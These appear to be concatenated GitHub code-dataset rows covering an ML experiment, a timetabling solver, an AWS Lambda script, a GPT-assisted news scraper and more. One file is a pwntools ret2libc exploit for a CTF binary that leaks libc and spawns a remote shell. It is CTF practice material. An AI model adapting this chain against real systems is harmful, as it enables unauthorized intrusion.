    long_description_content_type="text/markdown",
    # Packages live under src/ (src-layout).
    packages=setuptools.find_packages(where="src"),
    package_dir={"": "src"},
    # Ship non-Python assets declared in MANIFEST.in (frontend files).
    include_package_data=True,
    classifiers=[],
    python_requires=">=3.7",
    install_requires=["streamlit>=1.2", "jinja2"],
    url="https://github.com/blackary/streamlit-camera-input-live",
)
| blackary/streamlit-camera-input-live | setup.py | setup.py | py | 798 | python | en | code | 13 | github-code | 50 |
23476658762 | #모범답안
import heapq
def solution(food_times, k):
    """Return the 1-based index of the food eaten at second *k*.

    Foods are eaten one second at a time in round-robin order; finished
    foods drop out. Returns -1 when everything is eaten within k seconds.
    """
    if k >= sum(food_times):
        return -1
    # Min-heap of (time_needed, food_number): shortest dishes finish first.
    heap = []
    for number, needed in enumerate(food_times, start=1):
        heapq.heappush(heap, (needed, number))
    elapsed = 0                    # seconds already spent eating
    prev_time = 0                  # per-dish time of the last finished dish
    remaining = len(food_times)    # dishes still on the table
    # Remove whole "rounds" while the smallest remaining dish can be
    # completely eaten by everyone within the k-second budget.
    while elapsed + (heap[0][0] - prev_time) * remaining <= k:
        needed, _ = heapq.heappop(heap)
        elapsed += (needed - prev_time) * remaining
        remaining -= 1
        prev_time = needed
    # Order leftovers by food number and step the residual seconds forward.
    leftovers = sorted(heap, key=lambda item: item[1])
    return leftovers[(k - elapsed) % remaining][1]
print(solution([3,1,2,5], 5))
19492639639 | from flow.el.elCable import ElCable
class SinglePhaseMvCable(ElCable):
    """Single-phase medium-voltage electricity cable model."""
    def __init__(self, name, flowSim, nodeFrom, nodeTo, host, connectedPhase=0):
        ElCable.__init__(self, name, flowSim, nodeFrom, nodeTo, host)
        self.devtype = "ElectricitySinglePhaseMediumVoltageCable"
        self.hasNeutral = True
        self.phases = 1
        # US-style grids: record which phase of the three-phase system this
        # single-phase cable is connected to.
        # NOTE(review): the attribute keeps its original spelling
        # ("connectecPhase") because external code may read it.
        self.connectecPhase = connectedPhase
        # Bookkeeping per conductor (phase slots plus neutral).
        self.current = [0j for _ in range(self.phases + 1)]
        self.flowDirection = [1 for _ in range(self.phases + 1)]
        self.length = None       # meters
        self.ampacity = None     # amperes
        self.fuse = 0            # additional current limit
        self.enabled = True      # option to disable the cable
        self.burned = False
        # Indicates whether each conductor is powered (e.g. no upstream fault).
        self.powered = [True for _ in range(self.phases + 1)]
        # Example impedance values; real cable data should override these.
        self.impedance = [complex(0.049113, 0.71673), complex(0.1754399, 0.80535)]
| utwente-energy/demkit | components/flow/el/singlePhaseMvCable.py | singlePhaseMvCable.py | py | 1,005 | python | en | code | 11 | github-code | 50 |
23349911421 | import boto3
region = 'us-east-1'
tagvalue = 'mbiii'
lstinstance = list(())
ec2 = boto3.client('ec2', region_name=region)
def lambda_handler(event, context):
    """Return the IDs of EC2 instances tagged usecase=<tagvalue>.

    Builds the result list locally on every invocation. The previous
    version appended to the module-level ``lstinstance`` list, which is
    reused across warm Lambda invocations and therefore accumulated
    duplicate IDs over time.

    :param event: Lambda event payload (unused)
    :param context: Lambda context object (unused)
    :returns: dict with an 'instances' key holding the instance-id list
    """
    response = ec2.describe_instances(
        Filters=[
            {
                'Name': 'tag:usecase',
                'Values': [tagvalue]
            }
        ]
    )
    instance_ids = []
    for reservation in response["Reservations"]:
        for instance in reservation["Instances"]:
            instance_ids.append(instance["InstanceId"])
            print(instance["InstanceId"])
    return {
        'instances': instance_ids
    }
| ratokeshi/aws-lambda-ec2-instance-control | instanceec2list.py | instanceec2list.py | py | 841 | python | en | code | 0 | github-code | 50 |
28491020588 | import tensorflow as tf
def text_conv(embedding_input,filter_size,filter_num,var_scope=None,pooling_method='max',mode='train',dropout_rate=None):
    """1-D convolution over token embeddings followed by global pooling.

    Args:
        embedding_input: embedded text batch, cast to float32 here.
        filter_size: convolution kernel width.
        filter_num: number of convolution filters (output channels).
        var_scope: TF variable scope name; defaults to 'text_conv'.
        pooling_method: 'max', 'mean', or anything else (see NOTE below).
        mode: dropout is applied only when mode == 'train'.
        dropout_rate: fraction of units to drop during training.
            NOTE(review): defaults to None, so `1-dropout_rate` raises a
            TypeError whenever mode == 'train' and no rate is passed —
            callers must always supply a numeric rate when training.
    Returns:
        Tensor pooled over the sequence dimension.
    """
    with tf.variable_scope(var_scope or 'text_conv',reuse=tf.AUTO_REUSE):
        embedding_input=tf.cast(embedding_input,dtype=tf.float32,name='change_float')
        conv=tf.layers.conv1d(embedding_input,filter_num,filter_size)
        if mode=='train':
            conv=tf.nn.dropout(conv,keep_prob=1-dropout_rate,name='conv_dropout')
        if pooling_method=='max':
            # Global max-pool over the sequence axis.
            output=tf.reduce_max(conv,reduction_indices=[1],name='global_pooling')
        elif pooling_method=='mean':
            # Global mean-pool over the sequence axis.
            output=tf.reduce_mean(conv,reduction_indices=[1],name='global_mean')
        else:
            # NOTE(review): tf.reduce_all is a logical AND over booleans;
            # applying it to float activations looks wrong — this fallback
            # branch probably intended a different pooling op. Confirm.
            output=tf.reduce_all(conv,reduction_indices=[1],name='global_all')
        return output
4106942657 | from datasets import MedicalDataset
from tqdm import tqdm
class ToyDataset(MedicalDataset):
    """Minimal MedicalDataset subclass exposing index-based sample access."""
    def __getitem__(self, idx):
        # Delegate to the base class's sample loader.
        return self.get_sample(idx)
if __name__ == "__main__":
    # Exploratory script: iterate the validation set and accumulate simple
    # statistics; the commented-out sections are earlier visualisation and
    # distance-transform experiments kept for reference.
    import matplotlib.pyplot as plt
    import numpy as np
    from scipy.ndimage.morphology import binary_dilation, distance_transform_edt
    from visualisation import show_organs, show_dose_organs, show_sample, show_array
    train_dir = "challenge_data/validation/validation"
    train_dataset = ToyDataset(train_dir)
    sample = next(iter(train_dataset))
    # NOTE(review): despite the names, these accumulate statistics of the
    # structure masks, not of the CT volumes.
    mean_ct = 0
    std_ct = 0
    for sample in tqdm(train_dataset):
        ct = sample["ct"]
        possible_dose_mask = sample["possible_dose_mask"]
        structure_masks = sample["structure_masks"]
        dose = sample["dose"]
        all_mask = sample["all_structure_mask"]
        mean_ct += structure_masks.mean()
        std_ct += structure_masks.std()
        # output = distance_transform_edt(binary_dilation(all_mask, iterations=20))
    # Dataset-wide averages of the per-sample mean/std.
    print(mean_ct/len(train_dataset))
    print(std_ct/len(train_dataset))
    # output /= output.max()
    # output[all_mask == 1] = 1
    # output = np.multiply(output, possible_dose_mask)
    # # output = 80*output
    # show_array(output)
    # # output += output.mean() * np.multiply(1-all_mask, possible_dose_mask)
    # keys = ["ct", "possible_dose_mask", "dose"]
    # structure_masks = sum([0.1*i*organ for i, organ in enumerate(sample["structure_masks"])])
    # plt.figure()
    # for i, key in enumerate(keys):
    #     plt.subplot(1, 5, i+1)
    #     plt.imshow(sample[key])
    # plt.subplot(1, 5, 4)
    # plt.imshow(structure_masks)
    # plt.subplot(1, 5, 5)
    # plt.imshow(output)
    # plt.show()
    # show_array(output)
    # show_organs(sample)
    # show_dose_organs(sample)
    # show_sample(sample)
    # print(sample["organ_dose"].shape)
    # break
    # print(dose[dose != 0.].min())
    # print(dose[dose != 0.].max())
    # print(dose[dose != 0.].mean())
    # print(dose[dose != 0.].std())
| ubar667/radiotherapy_dose_prediction_kaggle | datasets/toy_dataset.py | toy_dataset.py | py | 2,171 | python | en | code | 0 | github-code | 50 |
15252893093 | #!/usr/bin/env python3
# CTF exploit (FwordCTF 2020 "one_piece"): classic two-stage ret2libc —
# leak a libc address via puts@plt, then return into system("/bin/sh").
from pwn import *
binary = context.binary = ELF('./one_piece')
context.log_level = 'INFO'
context.log_file = 'log.log'
'''
# local libc
libc = binary.libc
p = process(binary.path)
'''
# Remote task libc, identified with the libc-database by its symbol offsets.
libid = 'libc6_2.30-0ubuntu2.2_amd64'
libpath = os.getcwd() + '/libc-database/libs/' + libid + '/'
ld = ELF(libpath + 'ld-2.30.so')
libc = ELF(libpath + 'libc-2.30.so')
#p = process([ld.path, binary.path], env={'LD_LIBRARY_PATH': libpath})
p = remote('onepiece.fword.wtf', 1238)
#'''
# Stage 0: use the 'read' option to leak a runtime address and defeat PIE.
p.recvuntil('(menu)>>')
p.sendline('read')
p.recvuntil('>>')
p.send('y' * 0x27 + 'z')
p.recvuntil('>>')
p.sendline('gomugomunomi')
p.recvuntil('Luffy is amazing, right ? : ')
_ = p.recvline().strip()
# Page-align the leak and rebase the binary around the 'mugiwara' symbol.
mugiwara = (int(_,16) & (2**64 - 0x1000)) + binary.sym.mugiwara
log.info('mugiwara: ' + hex(mugiwara))
binary.address = mugiwara - binary.sym.mugiwara
log.info('binary.address: ' + hex(binary.address))
p.recvuntil('Wanna tell Luffy something ? : \n')
# Stage 1: overflow (0x38 bytes to saved RIP) and call puts(puts@got)
# to leak libc, then return into choice() for a second overflow.
rop = ROP([binary])
pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]
log.info('pop_rdi: ' + hex(pop_rdi))
payload = 0x38 * b'A'
payload += p64(pop_rdi)
payload += p64(binary.got.puts)
payload += p64(binary.plt.puts)
payload += p64(binary.sym.choice)
p.sendline(payload)
_ = p.recv(6)
# Leaked pointer is 6 bytes on the wire; pad to 8 for u64.
puts = u64(_ + b'\x00\x00')
log.info('puts: ' + hex(puts))
libc.address = puts - libc.sym.puts
log.info('libc.address: ' + hex(libc.address))
p.recvuntil('>>')
p.sendline('gomugomunomi')
p.recvuntil('Wanna tell Luffy something ? : \n')
# Stage 2: system("/bin/sh"); the extra 'ret' (pop_rdi + 1) keeps the
# stack 16-byte aligned for system().
payload = 0x38 * b'A'
payload += p64(pop_rdi + 1)
payload += p64(pop_rdi)
payload += p64(libc.search(b"/bin/sh").__next__())
payload += p64(libc.sym.system)
p.sendline(payload)
p.interactive()
| datajerk/ctf-write-ups | fwordctf2020/one_piece/exploit.py | exploit.py | py | 1,680 | python | en | code | 116 | github-code | 50 |
21923686793 | import time
from helpers import *
from enums import *
from preprocess import *
from solution import *
import math
"""
Process method -
This method contains the main instance processing and modeling logic
"""
def process(data):
    """Build the course model for one timetabling instance.

    Extracts the instance fields, removes forbidden periods, enriches the
    courses with room/period/curricula information, and groups them.

    Returns (courses, hard_constraints, constraints), or None when *data*
    is empty.
    """
    if not data:
        return None
    (courses, periods, slots_per_day, teachers,
     constraints, rooms, curricula, primary_primary_distance) = pluck(
        data,
        'Courses', 'Periods', 'SlotsPerDay',
        'Teachers', 'Constraints', 'Rooms',
        'Curricula', 'PrimaryPrimaryDistance'
    )
    periods = list(range(periods))
    # Hard constraints are the ones marked as forbidden.
    hard_constraints = [c for c in constraints if c['Level'] == 'Forbidden']
    period_constraints = [c for c in hard_constraints if c['Type'] == 'PeriodConstraint']
    event_period_constraints = [c for c in hard_constraints if c['Type'] == 'EventPeriodConstraint']
    event_room_constraints = [c for c in hard_constraints if c['Type'] == 'EventRoomConstraint']
    # Drop globally forbidden periods, then enrich and order the courses.
    periods = sieve_periods(periods, period_constraints)
    courses = flat_map_courses(courses)
    courses = add_possible_rooms(courses, rooms, event_room_constraints)
    courses = add_possible_periods(courses, periods, event_period_constraints)
    courses = add_curricula_info(courses, curricula, primary_primary_distance, slots_per_day)
    courses = add_same_teacher_courses(courses)
    courses = order_course_by_constraints(courses)
    courses = group_by_exams_and_parts(courses)
    return courses, hard_constraints, constraints
"""
Run a greedy search -
This section contains the main logic to run a greedy search from
the initial solution by mutation operators
"""
def greedy_search(instances, hard_constraints, instance_path, constraints, attempts = 2500):
    """Greedy search: repeatedly mutate the best solution found so far.

    Starts from an initial feasible solution and, for *attempts*
    iterations, keeps a mutation only when it lowers the cost. Every 10th
    iteration the current best is validated and its cost printed.

    :param attempts: number of mutation attempts to perform
    """
    solution = Solution.try_solving(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
    best_cost = float('inf')
    last_solution = solution
    for i in range(attempts):
        mutated_solution = Solution.try_mutating(last_solution)
        # Mutation can fail; skip and try again.
        if mutated_solution is None:
            continue
        if mutated_solution.cost < best_cost:
            best_cost = mutated_solution.cost
            last_solution = mutated_solution
        if i % 10 == 0:
            last_solution.validate()
            print(best_cost, last_solution.validation_results['cost'], last_solution.validation_results['valid'])
"""
Run a simluated annealing search -
This section contains the main logic to run a simluated annealing search from
the initial solution by mutation operators
"""
def sim_annealing(
    instances,
    hard_constraints,
    instance_path,
    constraints,
    maxsteps=1000,
    debug=False
):
    """Simulated annealing over solutions produced by mutation operators.

    Temperature decreases linearly from 1 to 0.01; worse solutions are
    accepted with probability exp(-(delta cost)/T). Returns the final state.
    """
    def acceptance_probability(cost, new_cost, temperature):
        # Always accept improvements; otherwise use the Metropolis criterion.
        if new_cost < cost:
            return 1
        else:
            p = math.exp(- (new_cost - cost) / temperature)
            return p
    def temperature(fraction):
        # Linear cooling schedule, clamped to [0.01, 1].
        return max(0.01, min(1, 1 - fraction))
    state = Solution.try_solving(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
    cost = state.cost
    states, costs = [state], [cost]
    for step in range(maxsteps):
        fraction = step / float(maxsteps)
        T = temperature(fraction)
        # NOTE(review): try_mutating may return None elsewhere in this file;
        # here its result is used unguarded — confirm it cannot be None.
        new_state = Solution.try_mutating(state)
        new_cost = new_state.cost
        if debug: print("Step #{:>2}/{:>2} : T = {:>4.3g}, cost = {:>4.3g}, new_cost = {:>4.3g} ...".format(step, maxsteps, T, cost, new_cost))
        if acceptance_probability(cost, new_cost, T) > random.random():
            state, cost = new_state, new_cost
            states.append(state)
            costs.append(cost)
        # Periodically cross-check against the external validator.
        if step % 10 == 0:
            state.validate()
            print(state.cost, state.validation_results['cost'], state.validation_results['valid'])
    return state
"""
Run hill climbing search -
This section contains the main logic to run a hill climbing search from
the initial solution by mutation operators
"""
def hillclimbing(instances, hard_constraints, instance_path, constraints, old_solution=None):
    """Hill climbing: move to the best sampled neighbour until no improvement.

    :param old_solution: optional starting solution; when None a fresh
        initial solution is constructed from the instance data
    :returns: the local optimum reached
    """
    def get_best_neighbour(solution):
        # Sample up to 15 mutations and keep the cheapest one found.
        best_cost = solution.cost
        best_solution = solution
        for _ in range(15):
            mutated_solution = Solution.try_mutating(best_solution)
            # Mutation can fail; skip failed attempts.
            if mutated_solution is None:
                continue
            if mutated_solution.cost < best_cost:
                best_cost = mutated_solution.cost
                best_solution = mutated_solution
        return best_solution
    if old_solution is None:
        solution = Solution.try_solving(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
    else:
        solution = old_solution
    neighbour = get_best_neighbour(solution)
    # Keep climbing while the sampled neighbourhood still improves the cost.
    while neighbour.cost < solution.cost:
        solution = neighbour
        neighbour = get_best_neighbour(neighbour)
    return solution
"""
Run an interated local search -
This section contains the main logic to run an interated local search from
the initial solution by mutation operators
"""
def iterated_local_search(
    instances,
    hard_constraints,
    instance_path,
    constraints,
    iterations=350,
):
    """Iterated local search: hill climbing restarted from perturbations.

    Runs an initial hill climb, then for *iterations* rounds perturbs the
    best solution with one mutation and hill-climbs again, keeping the
    result only when it improves. Every 3rd round validates and prints.
    """
    best_solution = hillclimbing(instances, hard_constraints, instance_path, constraints, None)
    best_solutions = []
    for n in range(iterations):
        # Retry until a mutation succeeds (try_mutating can return None).
        mutated_solution = None
        while mutated_solution == None:
            mutated_solution = Solution.try_mutating(best_solution)
        local_solution = hillclimbing(None, None, None, None, mutated_solution)
        if local_solution.cost < best_solution.cost:
            best_solution = local_solution
            best_solutions.append(best_solution)
        if n % 3 == 0:
            best_solution.validate()
            print(best_solution.cost, best_solution.validation_results['cost'], best_solution.validation_results['valid'])
    return best_solution
def test_evaluation(solution):
    """Cross-check the solution's internal cost against the validator's.

    Prints "TRUE EVALUATION" when both costs match, "FALSE EVALUATION"
    otherwise, followed by both costs and their absolute difference.
    """
    solution.validate()
    internal_cost = solution.cost
    external_cost = solution.validation_results['cost']
    verdict = "TRUE EVALUATION" if internal_cost == external_cost else "FALSE EVALUATION"
    print(verdict, internal_cost, external_cost, abs(internal_cost - external_cost))
"""
Solve one instance -
This section contains the main logic to solve one instance
"""
def run_solver(instance_path):
    """Solve a single instance file and save the initial solution.

    Parses and preprocesses the instance, constructs an initial solution,
    writes it to the solutions folder, then refines it with iterated
    local search (alternative searches kept commented for experiments).
    """
    start_time = time.time()
    tprint("Running solver on instance:", instance_path)
    data = parse(instance_path)
    instances, hard_constraints, constraints = process(data)
    # save_file("preprocess.json", instances, ".")
    solution = Solution.try_solving(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
    save_solution(instance_path, solution.export())
    end_time = time.time()
    tprint("Solver completed. Check solutions folder.")
    tprint(f"Completed in {end_time-start_time:.2f}s.")
    # Refinement phase; swap in another search strategy if desired.
    iterated_local_search(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
    # hillclimbing(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
    # greedy_search(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
    # sim_annealing(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
"""
Solve all instances -
This section contains the main logic to solve all instances,
which are present in the instances folder
"""
def solve_all_instances(folder = 'instances'):
    """Solve every instance file found directly under *folder*.

    The previous version interpolated a literal placeholder instead of the
    loop variable, so every iteration pointed at a nonexistent path; the
    file name from os.walk is now used.

    NOTE(review): files in subdirectories are joined against *folder*
    rather than their own dirpath — assumes a flat instances folder.
    """
    for _, _, files in os.walk(folder):
        print("Solving all instances.")
        for filename in files:
            run_solver(f'{folder}/{filename}')
"""
Main program -
This section runs the solver
"""
def main():
    """Entry point: solve all instances, or just the one given on the CLI."""
    if solve_all_arg(): solve_all_instances()
    else: run_solver(get_filepath())
"""
Execution
"""
# Run the solver when executed as a script.
if __name__ == '__main__':
    main()
| SynimSelimi/examination-timetabling | src/__main__.py | __main__.py | py | 8,115 | python | en | code | 1 | github-code | 50 |
26245664178 | import asyncio
import re
import requests
import openai
from bs4 import BeautifulSoup
from googleapiclient.discovery import build
from logger import setup_logger
from keys import OPENAI_KEY, GOOGLE_SEARCH_API, GOOGLE_SEARCH_ID
# Set up logger
logger = setup_logger('google_interests')
# Set up OpenAI API
openai.api_key = OPENAI_KEY
def google_search(query, api_key, cse_id, **kwargs):
    '''Perform a Google Custom Search and return the result items.

    :param query: search string
    :param api_key: Google API key
    :param cse_id: Custom Search Engine id
    :param kwargs: extra parameters forwarded to cse().list (e.g. num=9)
    :returns: the list under the response's 'items' key, or None when the
        response contains no items (an error is logged in that case)
    '''
    service = build("customsearch", "v1", developerKey=api_key)
    res = service.cse().list(q=query, cx=cse_id, **kwargs).execute()
    # Single lookup via .get instead of membership test + indexing.
    items = res.get('items')
    if items is None:
        logger.error(
            "Google Search response did not contain 'items'; returning None.")
    return items
def clean_data(data):
    '''Normalize scraped strings: replace newlines with spaces and trim
    surrounding whitespace from each item.'''
    cleaned = []
    for item in data:
        cleaned.append(item.replace('\n', ' ').strip())
    return cleaned
def get_content(url):
    '''Scrape a URL and return its text content grouped by HTML tag.

    Returns a dict mapping each tag in ('h1','h2','p','a','div') to a list
    of cleaned text snippets, or None when the page cannot or should not
    be scraped (non-200 status, Cloudflare-protected page, twitter.com
    link, or any request/parse error).
    '''
    try:
        # Browser-like User-Agent to reduce the chance of being blocked.
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36'
        }
        page = requests.get(url, headers=headers)
        if page.status_code == 200 and "cloudflare" not in page.text.lower() and "twitter.com" not in url:
            # Extract and clean content from specific tags
            soup = BeautifulSoup(page.content, 'html.parser')
            tags = ['h1', 'h2', 'p', 'a', 'div']
            contents = {tag: clean_data(
                [i.text for i in soup.find_all(tag)]) for tag in tags}
            return contents
        else:
            logger.warning(f"Could not scrape content from {url}.")
            return None
    except Exception as e:
        logger.error(f"An error occurred: {e}")
        return None
async def get_most_relevant_link_from_GPT_non_blocking(system_message, n=0):
    '''Await the GPT helper for *system_message* and return its result.

    The previous implementation wrapped the coroutine in
    loop.create_task() and awaited it immediately, which is equivalent to
    a plain await and adds nothing.

    NOTE(review): despite the name, this is still blocking — the inner
    helper makes a synchronous OpenAI call inside the coroutine, which
    stalls the event loop. True non-blocking behaviour would require
    running the sync call in an executor (loop.run_in_executor).

    :param n: kept for backward compatibility; unused, as before.
    '''
    return await get_most_relevant_link_from_GPT(system_message)
async def get_most_relevant_link_from_GPT(system_message, n=0):
    '''Send *system_message* to GPT and return the stripped reply text.

    Returns the model's reply with surrounding whitespace, trailing
    periods, and quotes stripped, or None when the API call fails.

    NOTE(review): the openai.ChatCompletion.create call here is
    synchronous and will block the event loop while it runs.

    :param n: unused; kept in the signature for interface compatibility.
    '''
    messages = [
        {"role": "system", "content": system_message}
    ]
    try:
        response_data = openai.ChatCompletion.create(
            model="gpt-3.5-turbo",
            messages=messages,
            max_tokens=200,
            temperature=0.4
        )
        return response_data.choices[0].message['content'].strip().strip('.').strip('"')
    except Exception as e:
        logger.error(f"An error occurred: {e}")
        return None
async def summarize_google(user_input, user_profile, last_3_conversations):
    '''Search Google for a conversation-relevant topic and summarize it.

    Pipeline: ask GPT for a search query -> run a Google Custom Search ->
    ask GPT to pick the most relevant result -> scrape it (falling back to
    other results when scraping fails) -> ask GPT to summarize.

    Returns (summary, url), or (error_message, None) on failure.
    '''
    api_key = GOOGLE_SEARCH_API
    cse_id = GOOGLE_SEARCH_ID
    # Step 1: have GPT craft the search query from the conversation context.
    system_message = f"Aisha, as an AI, you are about to decide what overall sentence to Google for the user. Considering the latest text message from the user: \"{user_input}\", the last 6 conversations: \"{last_3_conversations}\" and the user profile: \"{user_profile}\"\nWhat is the most relevant short google search, that most likely will have results, to continue this conversation? Google Search:"
    query = await get_most_relevant_link_from_GPT_non_blocking(system_message)
    logger.info(f"Query: {query}")
    # Step 2: run the Google Custom Search and bail out when it is empty.
    results = google_search(query, api_key, cse_id, num=9)
    if results is None:
        logger.error("No results from Google Search.")
        return "No results from Google Search.", None
    url_titles = [f"{i}. {result['title']}" for i,
                  result in enumerate(results)]
    logger.info(f"url_titles: {url_titles}")
    # Step 3: ask GPT to pick the most interesting title by its number.
    system_message = f"This is a list of the top 9 google search results for the query '{query}':\n"
    system_message += '\n'.join(url_titles)
    system_message += f"\nWhat is the one most relevant, amusing, and interesting news title number for the query '{query}', answer with only the number. \nNumber: "
    most_relevant_url = await get_most_relevant_link_from_GPT_non_blocking(system_message)
    # Parse the leading number out of the reply; fall back to index 1.
    # NOTE(review): bare except; also a reply like "9" would overrun the
    # 0..8 results list — confirm intended bounds handling.
    try:
        most_relevant_url = re.match(r'^(\d+)', most_relevant_url).group()
    except:
        most_relevant_url = 1
    most_relevant_url = results[int(most_relevant_url)]["link"]
    logger.info(f"Most relevant URL (Google Search): {most_relevant_url}")
    content = get_content(most_relevant_url)
    # Step 4: if scraping failed, try every other result in order.
    if content is None:
        for i in range(len(results)):
            # Skip the URL that we've already tried
            if results[i]["link"] == most_relevant_url:
                continue
            logger.debug("CONTENT IS NONE, MOVING TO LINK: %s", i)
            content = get_content(results[i]["link"])
            if content is not None:
                most_relevant_url = results[i]["link"]
                break
    # All URLs were blocked for scraping or were twitter links.
    if content is None:
        logger.error(
            "All URLs were either blocked for scraping or were twitter links.\n")
        return "Could not fetch news. Please try again later.", None
    # Truncate each tag's content to 400 chars to keep the prompt small.
    information = "\n".join(
        [f"{k}: {str(v)[:400]}" for k, v in content.items()])
    # Step 5: ask GPT to summarize the scraped information.
    system_message = f"Extract and summarize only news about \"{query}\" with dates from the URL: {most_relevant_url}\nInformation:\n{information}\nSummary:"
    summary = await get_most_relevant_link_from_GPT_non_blocking(
        system_message)  # + f" [Link: {most_relevant_url}]"
    logger.info(f"Summary: {summary}")
    return summary, most_relevant_url
if __name__ == '__main__':
    # Simple smoke test; performs live OpenAI and Google API calls.
    asyncio.run(summarize_google("Zoe Support",
                                 "Likes playing LOL", "I like playing LOL"))
| kpister/prompt-linter | data/scraping/repos/dimitri-sky~Aisha-AI-Demo/google_interests.py | google_interests.py | py | 6,158 | python | en | code | 0 | github-code | 50 |
16456969342 | import argparse
import copy
import hypergrad as hg # hypergrad package
import math
import numpy as np
import os
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.transforms as transforms
from torchvision import datasets
################################################################################
#
# Bilevel Optimization
#
# min_{x,w} f(x, w)
# s.t. x = argmin_x g(x, w)
#
# here: f(x, w) is on valset
# g(x, w) is on trainset
#
# f_x = df/dx
# f_w = df/dw
# g_x = dg/dx
# g_w = dg/dw
#
################################################################################
METHODS = [
'F2BA',
'AID',
'ITD'
]
def parse_args():
    """Parse CLI options for the data-cleaning experiment and seed the RNGs."""
    p = argparse.ArgumentParser()
    p.add_argument('--dataset', type=str, default="mnist", choices=["mnist", "fashion"])
    p.add_argument('--train_size', type=int, default=50000)
    p.add_argument('--val_size', type=int, default=10000)
    p.add_argument('--pretrain', type=int, default=0, choices=[0,1], help='whether to create data and pretrain on valset')
    p.add_argument('--epochs', type=int, default=5000)
    p.add_argument('--iterations', type=int, default=10, help='T')
    p.add_argument('--K', type=int, default=10, help='k')
    p.add_argument('--data_path', default='~/Data', help='where to save data')
    p.add_argument('--model_path', default='./save_data_cleaning', help='where to save model')
    p.add_argument('--noise_rate', type=float, default=0.5)
    p.add_argument('--x_lr', type=float, default=0.01)
    p.add_argument('--xhat_lr', type=float, default=0.01)
    p.add_argument('--w_lr', type=float, default=100)
    p.add_argument('--seed', type=int, default=1)
    p.add_argument('--alg', type=str, default='F2BA', choices=METHODS)
    p.add_argument('--lmbd', type=float, default=10.0)
    args = p.parse_args()
    # Seed both RNG sources so a run is reproducible end to end.
    np.random.seed(args.seed)
    torch.manual_seed(args.seed)
    return args
def get_data(args):
    """Load the dataset, split train/val, poison a fraction of the training
    labels, and normalize every split.

    Returns (trainset, valset, testset, old_train_y): each *set is a
    (flattened_inputs, labels) tuple; old_train_y holds the training labels
    as they were *before* poisoning.
    """
    data = {
        'mnist': datasets.MNIST,
        'fashion': datasets.FashionMNIST,
    }
    trainset = data[args.dataset](root=args.data_path,
                                  train=True,
                                  download=False)
    testset = data[args.dataset](root=args.data_path,
                                 train=False,
                                 download=False)
    # Random train/val split; pixel values rescaled to [0, 1].
    indices = torch.randperm(len(trainset))
    train_x = trainset.data[indices[:args.train_size]] / 255.
    val_x = trainset.data[indices[args.train_size:args.train_size+args.val_size]] / 255.
    test_x = testset.data / 255.
    targets = trainset.targets if args.dataset in ["mnist", "fashion"] else torch.LongTensor(trainset.targets)
    train_y = targets[indices[:args.train_size]]
    val_y = targets[indices[args.train_size:args.train_size+args.val_size]]
    test_y = torch.LongTensor(testset.targets)
    num_classes = test_y.unique().shape[0]
    assert val_y.unique().shape[0] == num_classes
    ### poison training data with noise rate = args.noise_rate
    num_noisy = int(args.train_size * args.noise_rate)
    rand_indices = torch.randperm(args.train_size)
    noisy_indices = rand_indices[:num_noisy]
    noisy_y = torch.randint(num_classes, size=(num_noisy,))
    # Snapshot the clean labels *before* the in-place poisoning below.
    old_train_y = train_y.data.clone()
    train_y.data[noisy_indices] = noisy_y.data
    # normalizing inputs to mean 0 and std 1 (statistics from the train split).
    mean = train_x.unsqueeze(1).mean([0,2,3])
    std = train_x.unsqueeze(1).std([0,2,3])
    trainset = ( torch.flatten((train_x - mean)/(std+1e-4), start_dim=1), train_y )
    valset = ( torch.flatten((val_x - mean)/(std+1e-4), start_dim=1), val_y )
    testset = ( torch.flatten((test_x - mean)/(std+1e-4), start_dim=1), test_y )
    return trainset, valset, testset, old_train_y
### initialize a linear model
def get_model(in_features, out_features, device):
    """Build a flat linear-model parameter tensor of shape
    (out_features, in_features + 1); the last column holds the bias.

    Weight/bias are initialized the same way nn.Linear does (Kaiming
    uniform weights, fan-in-bounded uniform bias).
    """
    params = torch.zeros(out_features, in_features + 1, requires_grad=True, device=device)
    init_w = torch.empty((out_features, in_features))
    init_b = torch.empty(out_features)
    nn.init.kaiming_uniform_(init_w, a=math.sqrt(5))
    fan_in, _ = nn.init._calculate_fan_in_and_fan_out(init_w)
    if fan_in > 0:
        bound = 1 / math.sqrt(fan_in)
    else:
        bound = 0
    nn.init.uniform_(init_b, -bound, bound)
    # Write the initial values in place without tracking gradients.
    params.data[:, :in_features].copy_(init_w.to(device))
    params.data[:, -1].copy_(init_b.to(device))
    return params
def model_forward(x, inputs):
    """Apply the flat linear model ``x`` to a batch of flattened inputs.

    ``x`` has shape (out_features, in_features + 1): every column but the
    last forms the weight matrix, the last column is the bias.  The input
    width is now inferred from ``x`` instead of being hard-coded to 28*28,
    so the same model works for any flattened feature size (backward
    compatible: for a 785-column ``x`` the slices are identical).
    """
    A = x[:, :-1]  # (out_features, in_features)
    b = x[:, -1]   # (out_features,)
    return inputs.mm(A.t()) + b.view(1, -1)
### original f, g, and gradients
def f(x, w, dataset):
    """Upper-level objective: cross-entropy of model ``x`` on ``dataset``.

    ``w`` is unused here but kept for a uniform (x, w, dataset) signature.
    """
    inputs, targets = dataset
    logits = model_forward(x, inputs)
    return F.cross_entropy(logits, targets)
def g(x, w, dataset):
    """Lower-level objective: ``w``-weighted cross-entropy plus L2 penalty.

    Per-sample losses are weighted by ``w`` clipped to [0, 1] before
    averaging; 0.001 * ||x||^2 regularizes the model parameters.
    """
    inputs, targets = dataset
    logits = model_forward(x, inputs)
    per_sample = F.cross_entropy(logits, targets, reduction='none')
    weighted = (per_sample * torch.clip(w, 0, 1)).mean()
    return weighted + 0.001 * x.norm(2).pow(2)
def g_x(x, w, dataset, retain_graph=False, create_graph=False):
    """Gradient of the lower-level loss g with respect to x."""
    return torch.autograd.grad(
        g(x, w, dataset), x,
        retain_graph=retain_graph, create_graph=create_graph)[0]
def g_w(x, w, dataset, retain_graph=False, create_graph=False):
    """Gradient of the lower-level loss g with respect to w."""
